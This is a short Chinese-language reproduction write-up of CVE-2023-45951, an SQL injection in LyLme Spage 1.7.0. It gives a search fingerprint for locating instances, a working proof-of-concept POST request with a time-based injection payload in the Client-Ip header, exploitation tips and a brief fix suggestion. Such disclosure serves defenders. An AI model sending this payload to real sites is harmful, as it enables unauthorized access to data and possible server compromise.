六零导航页SQL注入漏洞复现(CVE-2023-45951)
0x01 产品简介
LyLme Spage(六零导航页)是中国六零(LyLme)开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。
0x02 漏洞概述
LyLme Spage v1.7.0版本存在安全漏洞,该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞,未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。
0x03 影响范围
LyLme Spage 1.7.0
0x04 复现环境
title=="上网导航 - LyLme Spage"
0x05 漏洞复现
PoC
POST /apply/index.php?submit=post HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Client-Ip: 0'>if(1,sleep(10),2)>'
url=http%3A%2F%2Fbaidu.com&name=test&group_id=1&icon=&authcode=延时10秒
PS:漏洞存在于 HTTP Header 的 Client-Ip 字段,请求体中url字段值每请求一次就需要更换一次,不然无法成功
0x06 修复建议
在get_real_ip 中检查验证IP合法性,防止SQL注入